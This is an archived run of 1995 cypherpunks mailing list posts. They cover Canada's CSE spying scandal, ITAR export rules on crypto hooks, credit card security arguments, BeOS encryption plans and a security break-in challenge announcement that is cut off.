To: cypherpunks@toad.com
Subject: CSE gets flak on TV
Message-ID: <Pine.3.89.9511141646.A37652-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


For those who care, the Communications Security Establishment has been
getting some flak for spying on Mex. during NAFTA talks and on Korea to
help us sell Can. nuke reactors:
(This rather mirrors the trouble their sister agency, the NSA, has been 
getting into)
(sorry the online newscasts were rather vague)
     _________________________________________________________________ 
   
                        CP LOGO CANADIAN NEWS DIGEST 
                                       
   
   Tuesday, Nov. 14
   
   
   
   
   Electronic snooping part of the game
   
   
   OTTAWA (CP)--Intelligence experts say it's no big secret that Canada's
   high-tech spy agency snoops on friendly countries for financial gain. 
   
   Increasingly, intelligence agencies around the world are using their
   antennas, computers and codebreakers to gather economic information,
   Wesley Wark, a University of Toronto history professor, said Monday.
   
   Some of Canada's largest trading partners--including the United
   States, France and Japan--comb the airwaves for useful information, so
   Canada would be foolish not to join the game, said Wark. 
   
   Canada's secretive Communications Security Establishment--an arm of
   the Defence Department--collects and analyses communications traffic
   on the activities of foreign states, corporations and people.
   
   Jane Shorten, a former CSE employee, told CTV News in an interview
   Sunday the agency spied on Canada's allies and trading
   partners--including Mexico and South Korea--by eavesdropping on
   embassies, consulates and diplomats.
   
   ___


                                 HEADLINE NEWS
                                       
All times are Eastern Standard Time

Date: Tue-14-Nov-1995, Time: 13:00

   
   mexico and south korea are angry about reports that canada spied on
   them. the mexican government has filed a diplomatic note expressing
   its suprise and concern, and south korea has launched an inquiry. a
   former intelligence agent, jane shorten, says she spied on both
   countries, as well as japan, when she was with the communications
   security establishment. she says the c-s-e shifted its focus after the
   cold war from spying on the russians to spying on allies to get trade
   secrets. prime minister chretien says the organization is supposed to
   operate within the law. chretien says the c-s-e doesn't report to him
   on a daily basis, so he doesn't know if it was spying on anyone. 
   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 15 Nov 1995 06:49:32 +0800
To: ses@tipper.oit.unc.edu
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <9511142220.AA13813@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>are specifically designed for the insertion of cryptographic materials, 
>or is it the fact that they could be used to support cryptographic 
>enhancements?

Everything is decided on a case-by-case basis.  I was in a meeting
with some NSA export-control people (Dept Z03) and asked a few questions
on this topic trying to nail down the angle of this slipper slope.

Basically, generic buffer-manipulation is okay.  "Keyed compression"
where you explicitly passed something called a key to a DLL routine
would be looked on suspiciously.  An abstract set of open/modify/close
routines (where open returned a pointer to opaque state, say a session
key :) would be fine.  The technical guy quickly grasped that I was
talking about anonymous remailers, but they "conceded" there's nothing
they can do about it.

I say "concede" because that implies more political/control-issues
then were really present at the meeting.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 15 Nov 1995 06:51:26 +0800
To: cypherpunks@toad.com
Subject: CSE gets flak on TV
Message-ID: <199511142220.RAA05223@pipe9.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by s1113645@tesla.cc.uottawa.ca () on Tue, 14 
Nov  4:47 PM

>For those who care, the Communications Security 
>Establishment has been  getting some flak for spying on 
>Mex. during NAFTA talks and on Korea to  help us sell 
>Can. nuke reactors:


Here's a facet of the burgeoning counterspying, oops, biz-intel 
blathering, oops, globally competing, oops, leveling the 
playing field, oops, securing the econo-nation, oops, 
downsizing spies and X-spies and XX-ing spies and putting to 
pasture cud-chomping nincompoops of the Chomsky-contra-CIA 
golden-asses era:

---------

   The Wall Street Journal, November 14, 1995, p. A15.


   This Is the CEO -- Get Me the CIA [Op-Ed, excerpts]

   By Ernest Brod. (Mr. Brod is executive managing director of
   Kroll Associates, an international investigation, business
   intelligence and security frim based in New York.)


   While government policy makers ponder and debate [economic
   espionage] issues, U.S. companies are fighting the global
   competitiveness battle. In the past year U.S. companies
   have rushed to level the playing field with foreign
   competitors who have long exploited the advantage of
   competitor intelligence. For years, foreign-based
   multinationals have had teams of people devoted to learning
   as much as they could about their U.S. competitors. The
   methods ranged from in-depth research and analysis of
   publicly available information to covert and sometimes
   clumsy attempts at industrial espionage, in some cases with
   the active support of their government's intelligence
   agencies.

   Today, having had their consciousness raised by the global
   business realities of the '90s, U.S. companies in all
   industries are scrambling to set up units devoted to
   gathering strategic information about the competition.
   Teams can be found at both corporate and division levels;
   they may be multi-department or reside within planning,
   development, marketing, finance or international units.
   They may have euphemistic labels and they increasingly draw
   upon burgeoning numbers of outside private resources.

   In recent months, for example, my firm was asked to help
   determine:

   + Whether an Asian competitor will take advantage of the
   North American Free Trade Agreement to establish facilities
   in Mexico in order to supply the U.S. market.

   + How an overseas competitor with an apparently comparable
   cost base can consistently produce lower bids.

   + Who controls an overseas private company and how deep are
   their pockets.

   While the controversy continues over whether U.S. companies
   should be favored with government-sponsored industrial
   intelligence, managers are already employing legal and
   ethical research and investigative techniques to learn more
   about the methods, resources and plans of their marketplace
   adversaries.

   These forays may not be exciting, risky or glamorous enough
   for our battle-hardened spy masters, but they help American
   strategists win hard-fought ground from their adversaries.













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 15 Nov 1995 18:12:14 +0800
To: cypherpunks@toad.com
Subject: credit card conventional wisdom
Message-ID: <199511150156.RAA18623@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I've been seeing a particular meme-nugget of conventional wisdom
circulating in reference to credit cards that I'd like to debunk.
(recently showed up in the WSJ, "Boardwatch" magazine editorial
column, etc). these legends and thinkings are starting to annoy
me to the point of becoming a pet peeve.

the argument goes like this: secure credit card number uploading
schemes (such as in Netscape) are not important on the internet because 
credit card numbers are already insecure. you give them to low-wage
workers all the time who might steal the number from you anyway.

there are a lot of fallacies with this. I find this to be a key
cypherpunk issue, and I hope others will agree to the point of
trying to attack this fallacy through letters to the editor,
debates, etc., because it seems to rationalize weak security.

- 1st point: yes, you do give credit cards to low wage workers
in businesses, but this is not directly parallel to sending a
credit card over the internet. the fuzzy thinking goes like
this: "credit card numbers are already not secure. therefore, trying to
secure them is frivolous". this is patently ridiculous on the
face of it. it's circular reasoning. credit card numbers could
become more secure if all businesses made them more secure.
getting all businesses to make them secure is part of the battle.
raising consciousness on the issue is part of the battle. saying,
"there is no point" is a copout imho.

- the insecurity of sending a card over the net could be far better
or worse than that of handing it to an individual. 1st, when you
send a number over the net, potentially anyone (including people other
than the destination business) could spy on it. 
when you give it to someone in a company, only that representative
(who would be trusted by the company)
has access to it. or, alternately, maybe no one could *ever* see
your card sent over the internet, including workers at the end
site, who never deal with the numbers directly. such a system
is possible and may become the norm. but not if shallow-thinking 
people can't imagine it as possible.

- it is not impossible to have cards that don't have numbers but
instead have magnetic stripes, and the only way for them to work
is to be physically scanned. this would reduce fraud but would also
reduce the convenience of sending numbers over the phone (mail
order) for example. I'm not saying all cards should be this way,
but it might make sense for some people to get a "scan only card"
that cannot be used unless physically scanned. the point is that
there are variations on the credit card theme that make them more
secure, and there's a bit of a hurdle in getting Joe Sixpack to
realize this, and realize it's desirable.

- the boardwatch magazine editor argued that uploading credit card numbers
over the internet in a secure fashion is a "non problem" because
credit cards are already insecure. have you ever heard of PROGRESS,
mr. bonehead? if the net began to make credit transactions more
secure, perhaps that would create a momentum in which other offline
businesses might become more strict or careful about credit card
security.

- credit card fraud is absolutely enormous in this country. and there
are not really any very strong safeguards against it except a 
lot of "security through obscurity" (of credit card numbers). *everyone*
pays the cost of this horrible fraud rate through increased
transaction charges, higher interest rates, etc.  just because you
may not see it itemized on your credit card bill, does not mean you
are not paying for it. (in much the same way that a sort of
"shoplifting tax" is reflected in the cost of all merchandise).

- the internet may eventually become completely secure. arguing that
"we don't need security on the internet because we don't have it in
the business world of daily credit card use, and they get along fine"
is ridiculously simplistic and specious. the fact is that businesses
do *not* really like many aspects of credit cards: low security,
overhead costs, cost of interface devices to the credit card companies,
etc.  all these negative ingredients could be improved in cyberspace.
but it won't happen if every time a new superior system comes along,
someone argues, "but there's nothing wrong with what we have now!!!"
when this is quite obviously mistaken to anyone with any minimal 
background& understanding in the area. furthermore, consumers are
somewhat notorious for not really knowing what they want, and sometimes
arguing against something they would buy or use in the future.

==

I'm continually amazed at how often security issues are mixed up
in people's brains and reasoning. there are a lot of fallacies that
work their way into respectable writing by reputable people
that tend to mirror circular
reasoning such as, "if something is insecure already, it makes no
point to try to make a piece of it more secure".  security is sometimes won
slowly in increments, in which one could argue against each increment
as useless or inconsequential, but the end result could lead to 
far better security. furthermore, there are a lot of different kinds
of security weaknesses-- there is not a simple black-and-white 
measurement of "secure" vs. "insecure" but a lot of intermediate
gradations.

attempts to get secure credit card number transfer on the internet
are not an end in themselves. they are the first steps toward an 
entirely new transaction system. those who see a single step and
criticize it as feeble in the context of past systems
are missing the point and apparently can't think past the present 
nanosecond of their lives.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 15 Nov 1995 07:36:19 +0800
To: cypherpunks@toad.com
Subject: world smartcards..
Message-ID: <199511142317.SAA11549@pipe9.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by msew+@andrew.cmu.edu (Martin C Sweitzer) 
on Tue, 14 Nov  3:51 PM

>Anyone know what kind of encryption they will be 
>using...


HP's web site at <http://www.hp.com> has more info on the cards 
and the related "international cryptographic platform" being 
crippled and begged and groveled to USG for export.


Try the site's search feature for "encryption" to poke around 
HP's various products, where some of the crypto to be employed 
is cited, if hypocryptically.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 15 Nov 1995 08:10:34 +0800
To: llurch@networking.stanford.edu (Rich Graves)
Subject: Re: ANNOUNCE: Curve Encrypt 2.2
In-Reply-To: <Pine.ULT.3.91.951113204535.2116G-100000@Networking.Stanford.EDU>
Message-ID: <199511142342.SAA03627@homeport.org>
MIME-Version: 1.0
Content-Type: text


| Sounds cool, but...
| 
| I already have PGP on my Macs. Why would I want this?

Much easier to use.  Faster than PGP on a mac.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 15 Nov 1995 08:32:55 +0800
To: cypherpunks@toad.com
Subject: Get your own ITAR
Message-ID: <9511150016.AA14450@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


    1 703 875 6644.
The kindly administrative assistant there will take your name and address
and send you a hardcopy of the ITAR regulations.  I don't know about
overseas mailings.  I also imagine you will have to wait until the current
US budget stale-mate is resolved.  (Thanks to digest-reader walt@osf.org
for the phone number.)
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Wed, 15 Nov 1995 11:39:29 +0800
To: cypherpunks@toad.com
Subject: Re: credit card conventional wisdom
Message-ID: <199511150321.AA17449@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Detweiler writes:

> the argument goes like this: secure credit card number uploading
> schemes (such as in Netscape) are not important on the internet because 
> credit card numbers are already insecure. you give them to low-wage
> workers all the time who might steal the number from you anyway.

> there are a lot of fallacies with this. I find this to be a key
> cypherpunk issue, and I hope others will agree to the point of
> trying to attack this fallacy through letters to the editor,
> debates, etc., because it seems to rationalize weak security.

You're only reproducing half of the debate, which goes like this:

Businesses/customers won't trust the Internet for commerce, because it's
not perfectly secure.

And then others go on to point out that businesses and consumers do business
every day using commerce tools whose security features are weak to nonexistent.

So, no, we don't have to "get the Internet ready for business" because it's
already at least as secure as ordinary consumer transactions. This doesn't
mean that it's not important to work on security, just that it's a useful
direction for improvement, not a baseline requirement.

Most consumer-level transactions are based on a general sort of 
trust-in-human-nature sort of policy, backed up by the knowledge that a single
failed transaction (or even a constant low level of failed transactions, where
failed == "didn't get paid but gave the stuff away") isn't likely to kill off
a business or even make it unprofitable. Loss by theft or fraud can be thought
of like any other sort of overhead - and it doesn't make sense (financially)
to spend more to eliminate it than you'll recover by that elimination. 
Pursuing criminal or civil charges against a non-performing party is 
expensive - most people do it out of a sense of moral outrage, or because they
want to maintain a public perception of unforgiveness, not because they 
really think they'll get back what they've expended in time, money, and 
opportunities lost for other (more profitable) pursuits. (see Axelrod on
the Prisoner's Dilemma tournaments for the arguable game-theory C-punks
cryptoanarchy relevance.)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKlcz33YhjZY3fMNAQEAlwP7B+cP/IB1wZ0TeWwwoL5j9z4m5irIO9yV
O5599i6fiJ2X3+HbJKGY0/aENs1Zq6kNPHo1I/HcjBhN3fazwelv5BV1dFfmnfUp
lPA8DOTraM7qGse6JEpG+tyJa7bL4wadjDAlFVe4uPSxokw1gppBMkZa6pcwd3cX
zQ7ammmgeQI=
=ZZi9
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Wed, 15 Nov 1995 10:41:03 +0800
To: cypherpunks@toad.com
Subject: encryption in BeOS kernel
Message-ID: <199511150222.TAA15162@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Some of you may be aware of this interesting new computer named the
"BeBox" which will start shipping in Q1 96 I think.
 Go here for more info. 


A paragraph on the Q&A page caught my attention and when they asked
for expert advice I naturally thought of you guys.


"Q: What security protection will the BeBox have?

 A: We're planning to offer a security/encryption mechanism at the
 kernel level. However, we haven't nailed down the details of this
 mechanism, so your expert input would be appreciated. One of our
 primary interests is to allow encryption of application software for
 individual machines. (The flash ROM in each BeBox will be serialized
 in the portion of the ROM which is unmodifiable.)"


I have two things to add:

1.  The scheme they mention there is, I think, intended to be a 
software protection scheme and like all such is doomed to failure.  
I hope they don't spend to much effort on it.  On the other hand
there might be some nifty crypto applications that could use this
unique identifier.  Although none come to mind...


2.  Be, Inc. is located in Menlo Park, CA, USA and Paris, France.  
They couldn't have picked two countries who are more likely to 
royally screw them by restricting the export/sale of their product 
once said product has encryption built-in.  (Of course they could 
put the encryption in a loadable kernel module, which would be an 
interesting test of ITAR's "crypto-with-a-hole" restrictions.)


I hope the NSA isn't reading this and getting ideas...


Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://www-ugrad.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMKlOufWZSllhfG25AQFQWwP/TQ6MM3xmoZ6bel/mTsLhX/TpEOn5YWMc
F6IsTUfpLbCMHGUmIoF09qFJNaB2zvPhy8gzx9eZxU1EoPYBCi76q/pNWGiyw0Xa
21iRjC62pq/v8oroQCPpLgU27btd8EBlz7/q46tzWD1Jphb5IjTQ1L0PxqQB6H5t
EBhbsR8h9iA=
=9bYq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 15 Nov 1995 12:55:09 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re: credit card conventional wisdom
In-Reply-To: <9511150243.AA14648@sulphur.osf.org>
Message-ID: <Pine.SOL.3.91.951114203506.18220A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 Nov 1995, Rich Salz wrote:

> >There is in fact a distinction between "card present" and "card not present"
> >transactions. AMEX cards for example have an extra group of four digits which 
> >are not part of the embossed card number. They are used as additional 
> >verification to prove that a card is present.
> 
> So the run-it-through-the-mechanical-device is treated as card not present?

No. What Phil is saying is that the magnetic strip contains an extra 
group of digits which are only available when the stripe is read, and not 
when the card is used for CNP. 

I can't confirm or deny this, as despite my new bosses, I still find it 
hard to care about credit card readers (mostly because US banks won't 
let me have any). 

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 15 Nov 1995 13:02:32 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Random Thoughts (was Re: BBS Generator Code)
In-Reply-To: <Pine.3.89.9511142310.A14556-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.SOL.3.91.951114204508.18220B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



Re: Blum-Blum-Shub.

Isn't the best reason to use BBS the fact that it's just so 
much fun to say- it sounds like something out of Lovecraft.
Blum Blum Shub Niguath, the Black Code of the woods with a thousand bits. 

MD5 and LFSRs are just plain dull.

Simon // All I wanna do is make a Blum-Blum-Shub with a zoom-zoom





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 15 Nov 1995 13:15:57 +0800
To: cypherpunks@toad.com
Subject: Re: encryption in BeOS kernel
Message-ID: <acceb284000210049f9b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Either John Young or someone imitating his style wrote:

>Would chip-fabbers covertly Fortezza chips to get export ok?
>

I have no idea what "Fortezza" means as a verb, but I'll Moscow a guess:
Intel might, according to this guesser, insert NSA-approved back doors in
"information appliance" chips.

Unlikely in the extreme, for a variety of reasons. First, designers cannot
keep secrets. Second, examination of the chips would reveal such meddling.
Third, Intel is only one of several likely providers of such chips (e.g.,
Oracle is said to have plans to use Acorn ARM chips, and DEC may also
provide low-end Alpha chips, and of course Motorola-IBM has variants of the
PPC to provide).

>Motorola, HP, IBM, others long-linked to USG are ever ready
>to gobble international market share in the national
>interest.
>
>Intel, sure, world-class fab plants planting chip-secrets.
>
>Wonder if that key escrow protest to Gore is a cover for
>economic actions authorized by National Security D&D?

Too much Pynchon?

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 15 Nov 1995 13:26:01 +0800
To: cypherpunks@toad.com
Subject: Re: credit card conventional wisdom
Message-ID: <199511150512.VAA08514@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 Nov 1995, Greg Broiles wrote:

> Detweiler writes:
> 
> > the argument goes like this: secure credit card number uploading
> > schemes (such as in Netscape) are not important on the internet because 
> > credit card numbers are already insecure. you give them to low-wage
> > workers all the time who might steal the number from you anyway.
> 
> > there are a lot of fallacies with this. I find this to be a key
> > cypherpunk issue, and I hope others will agree to the point of
> > trying to attack this fallacy through letters to the editor,
> > debates, etc., because it seems to rationalize weak security.
> 
> You're only reproducing half of the debate, which goes like this:

Actually, this is not quite correct.  There is a difference if I give a
credit card to *one* person, or if I give the message containing that
number to a chain of twenty or thirty strangers to get my information to
the one person I want to have that information. 

We're back to handing your card to the neighbour, who gives it to the 
doorman, who flags the cab and gives it to a cabbie, who then drives 
cross town and gives it to another doorman, who then etc, etc.

Something completely different than the long bomb from the quarterback.

Our potential interception points have increased substantially ... and we
have absolutely no audit trail to figure out who *might* have scarfed the
card. 

I guess the average customer won't care.  His loss is limited to $50.

But some of us who try to live in the real world wonder how long that'll
last.  Can we measure the life of it in a matter of weeks??  Or months? 

> Businesses/customers won't trust the Internet for commerce, because it's
> not perfectly secure.
> 
> And then others go on to point out that businesses and consumers do
> business every day using commerce tools whose security features are weak
> to nonexistent. 

Hmmm ... maybe we'll even get a whole whole new industry going ... don't
ya think??  Maybe we can create a whole new set of risks which are
additive to those we already have.  Maybe every petty grifter might trade
in his very own credit card number and simply claim that their credit card
got stolen over the internet. 

Just disappeared into the anonymous aethyr ... the one without an audit
trail ... but my loss is limited to $50, right??

I guess other people understand systems much, much, more than I do.  I
guess that the NY Times is right ... it won't change the loss rate for the
card companies, at all ... nope ... won't create a new problem ... naahh
... the public wouldn't actually take advantage of holes like this in the
system. 

Nope, no sirreee ...  

Give your head a shake.




Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@pdcorp.com (Dan Weinstein)
Date: Wed, 15 Nov 1995 05:38:17 +0800
To: James Black <black@sunflash.eng.usf.edu>
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <Pine.SUN.3.91.951114144604.9607A-100000@sunflash.eng.usf.edu>
Message-ID: <199511142110.NAA28546@email.pdcorp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 Nov 1995 14:49:23 -0500 (EST), you wrote:

>Hello,
>
>On Tue, 14 Nov 1995, Jeff Barber wrote:
>
>> s1113645@tesla.cc.uottawa.ca writes:
>> 
>> Does anyone know the ostensible justification for this?  What section of
>> the ITARs do they point to when they say "this is illegal"?  I've perused
>> an online copy of ITAR (no, I haven't read all of it -- I have other
>> things I want to do this year :-), but I can't find a section that could
>> be construed to support this contention.
>
>  I scanned through the ITAR, and I agree that there doesn't seem to be 
>anything about hooks that are illegal, but the NSA does have the 
>authority to protect whatever threatens national security.  If they are 
>over-stepping their bounds who is going to push it to court to find out, 
>as that is where the decision would have to be made (very expensive).
>  Take care and have fun.

The ITAR talks about crypto components, the government is interpreting
this as software that allows plug-in encryption.



Dan Weinstein
djw@pdcorp.com
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 15 Nov 1995 10:52:04 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: credit card conventional wisdom
In-Reply-To: <199511150156.RAA18623@netcom21.netcom.com>
Message-ID: <9511150233.AA31764@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



The articile misses the point. What the credit card cos are worried about is the 
disclosure of credit card numbers in bulk by merchant servers connected 
incompetently to the internet. The issue of customer exposure is a non issue, 
regulation E means that there is no customer risk.

There is in fact a distinction between "card present" and "card not present"
transactions. AMEX cards for example have an extra group of four digits which 
are not part of the embossed card number. They are used as additional 
verification to prove that a card is present. In general a merchant pays a lower 
commission for card present transactions to reflect the reduced risk.

The point of the article is that people running roung like headless chickens 
because of Internet insecurity miss the main point, the security is no worse 
than the real world we just have rather higher standards.

What it does mean is that people like myself will be able to make a nice living 
explaining to people what security issues to forget and which ones to worry like 
hell about.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 16 Nov 1995 00:24:16 +0800
To: hallam@w3.org
Subject: Re: credit card conventional wisdom
Message-ID: <9511150243.AA14648@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>There is in fact a distinction between "card present" and "card not present"
>transactions. AMEX cards for example have an extra group of four digits which 
>are not part of the embossed card number. They are used as additional 
>verification to prove that a card is present.

So the run-it-through-the-mechanical-device is treated as card not present?
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 16 Nov 1995 00:24:34 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re: credit card conventional wisdom
In-Reply-To: <9511150243.AA14648@sulphur.osf.org>
Message-ID: <9511150255.AA01940@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



For AMEX, it apears not! Or at least there is a requirement for the 
assistant to enter the extra four digits in certain cases. The precise
nature of the circumstance when they are required to be card present I
am not sure (in fact I would bet they vary).

There is no reason why the magnetic strip should necessarily be considered
to be card present. It is easy enough to forge, readers need not be
attended (eg petrol pumps).

I'm not sure on the exact rules, I don't pay $80 for the privillege of having
plastic!

Thew main point I was responding to was the "add information to card that
is not on the stripe" point of the original poster.



	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Karen E Cooper <kecooper@maroon.tc.umn.edu>
Date: Wed, 15 Nov 1995 12:22:32 +0800
To: cypherpunks@toad.com
Subject: Applied Cryptography MPLS Book Release Party
In-Reply-To: <30a9659e030b002@maroon.tc.umn.edu>
Message-ID: <30a967be0ba7002@maroon.tc.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


APPLIED CRYPTOGRAPHY 2nd Ed. BOOK RELEASE PARTY

Please come out and meet author Bruce Schneier at a drinks and hors
d'oeuvre reception to celebrate the publication of Applied Cryptography,
2nd Ed. 

The reception is in Minneapolis, Minnesota on Wednesday, 29 November, 1995, 
from 5:00 to 8 pm.

RSVP for directions and specifics.


Karen Cooper
(612) 823-1098
kecooper@maroon.tc.umn.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark C. Henderson" <mch@squirrel.com>
Date: Wed, 15 Nov 1995 14:55:01 +0800
To: cypherpunks@toad.com
Subject: Re: CSE gets flak on TV
In-Reply-To: <Pine.3.89.9511141646.A37652-0100000@tesla.cc.uottawa.ca>
Message-ID: <9511142245.ZM12784@squirrel.com>
MIME-Version: 1.0
Content-Type: text/plain


On Nov 14, 16:47, s1113645@tesla.cc.uottawa.ca wrote:
> Subject: CSE gets flak on TV
> For those who care, the Communications Security Establishment has been
> getting some flak for spying on Mex. during NAFTA talks and on Korea to
> help us sell Can. nuke reactors:

Folks who are interested in the CSE should also check out the
"unofficial CSE home page" at
http://watserv1.uwaterloo.ca/~brobinso/cse.html

There is also a very dull "official" home page at
http://www.cse.dnd.ca


-- 
Mark Henderson -- markh@wimsey.bc.ca, henderso@netcom.com, mch@squirrel.com
PGP 1024/C58015E3 fingerprint=21 F6 AF 2B 6A 8A 0B E1 A1 2A 2A 06 4A D5 92 46
cryptography archive maintainer  --  ftp://ftp.wimsey.com/pub/crypto
ftp://ftp.wimsey.com/pub/crypto/sun-stuff/change-sun-hostid-1.5.1.tar.gz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Thu, 16 Nov 1995 06:55:49 +0800
To: cypherpunks@toad.com
Subject: Re: BBS Generator Code Needed & crypto++
In-Reply-To: <9511141749.AA28423@zip_master2.sbi.com>
Message-ID: <Pine.3.89.9511142310.A14556-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 14 Nov 1995, David Macfarlane wrote:

> Wei Dai's crypto++ has BBS, if you can find a copy.

Try:
(quoting Wei Dai) 

ftp://ftp.csn.net/mpj/I_will_not_export/crypto_?????/libraries/crypto11.zip
 
where ????? is in ftp://ftp.csn.net/mpj/README
 
I encourage people to use this library in commercial as well as 
shareware/freeware products.  You don't have to pay me a cent, but 
don't forget about the patents.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Wed, 15 Nov 1995 08:08:44 +0800
To: cypherpunks@toad.com
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <Pine.3.89.9511142357.A2503-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 Nov 1995, Raph Levien wrote:

> I move we file a CJR on some suitable software with crypto hooks.

If you want to get really warped, feel free to file a CJR for Privtool,
it's a mail program with crypto hooks but no crypto, and has the added
advantage of being written outside the US but still illegal to export, as
far as I can tell (certainly it's now on the export-controlled section of 
c2.org).

In fact, maybe I should file one myself, as it's a real pain to have to 
tell non-US users to get it from a non-US site rather than the 'official' 
distribution site at c2.org. Can non-US citizens do these things ?

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Wed, 15 Nov 1995 15:10:54 +0800
To: cypherpunks@toad.com
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <m0tFbde-0008zsC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


> > >I think it's 121.1, Category XIII paragraph (b) item (5):
> > >"Ancillary equipment specifically designed or modified for paragraphs (b)
> > >(1), (2), (3), (4) and (5) of this category;"
> > 
> > Question:  What makes computers in general NOT describable by such a
> > paragraph?!?
>
>"specifically designed"?
>
>nathan

That makes it easy:  Just make sure that you also write a compressor or
filter program with similar compatibility, and nobody can argue that the
hooks were SPECIFICALLY DESIGNED for encryption.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 15 Nov 1995 14:02:31 +0800
To: cypherpunks@toad.com
Subject: WebSTAR security challenge. Make $10,000 breaking in a site.
Message-ID: <v02120d02accf288d9174@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


>From TidBITS:

**$10,000 Internet Security Challenge** -- I wrote about the
  WebMaster Macintosh security challenge back in TidBITS-295_ and,
  as expected, no one was able to break WebSTAR's security and claim
  the prize of free passes to the WebEdge conference. Now the stakes
  have increased. Seven companies - StarNine, EveryWare, Maxum,
  ComVista Internet Solutions, WebEdge, Digital Forest, and Westwind
  Computing - have joined forces to offer a more lucrative prize of
